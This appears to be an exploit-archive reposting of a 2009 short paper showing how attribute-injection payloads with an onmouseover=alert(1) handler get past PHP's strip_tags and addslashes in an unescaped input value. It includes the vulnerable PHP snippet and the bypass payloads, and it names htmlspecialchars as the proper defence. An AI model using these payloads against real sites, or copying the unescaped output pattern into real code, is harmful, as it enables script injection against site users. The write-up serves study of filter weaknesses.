XSS Workaround For strip_tags And addslashes

XSS Workaround For strip_tags And addslashes: Posted Aug 26, 2009; Authored by Inj3ct0r | Site Inj3ct0r.com; This paper documents a cross site scripting workaround for strip_tags and addslashes.; tags | paper, xss; SHA-256 | 7aa842a76e4ec47865c611db68a692cad7db17b86333f2d6fba41e17ca13aff2; Download | Favorite | View

XSS Workaround For strip_tags And addslashes

=====================================================
Workaround strip_tags () and addslashes () in the XSS
=====================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com
  
So, imagine such a simple script:


PHP code:

<?php 
$xss=''; 
$xss=trim(strip_tags(addslashes($xss))); 
print '<input name="123" value="'.$xss.'"/>'; 
?>

  
Now the standard test methods:

PHP code:

 //1 
$xss='" onmouseover=alert(1) a="'; 
//2 
$xss='"><script>alert(1)</script><'; 

  
In the first case, we removed XSS function addslashes (),
in the second - a function strip_tags. XSS is not gone = (


Now, our variable set equal to the following value:

PHP code:

$xss='" style="a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;" onmouseover=alert(1); a="';


Get this html code:

<input name="123" value="\" style=\"a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;\" onmouseover=alert(1); a=\""/> 


Alert! =))
  
Usually applies htmlspecialchars () / htmlentities (), and this is the surest way to protect against XSS.

Now we are not an obstacle as strip_tags, and addslashes =)

As you can see, there is closure of the first attribute, then a big block of CSS and the implementation of javascript onmouseover =)

Tested on IE8, Firefox 3, Opera 9.51, and Safari 3

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~  - [ [ : Inj3ct0r : ] ]

Top Authors In Last 30 Days

Red Hat 250 files
indoushka 184 files
Ubuntu 99 files
Gentoo 32 files
Debian 18 files
malvuln 13 files
Frederik Beimgraben 11 files
Chris Beiter 11 files
Matthias Deeg 11 files
Apple 10 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,132)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,415)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,896)
UNIX (9,464)
UnixWare (188)
Windows (6,782)
Other

XSS Workaround For strip_tags And addslashes

XSS Workaround For strip_tags And addslashes

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

XSS Workaround For strip_tags And addslashes

Share This

XSS Workaround For strip_tags And addslashes

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems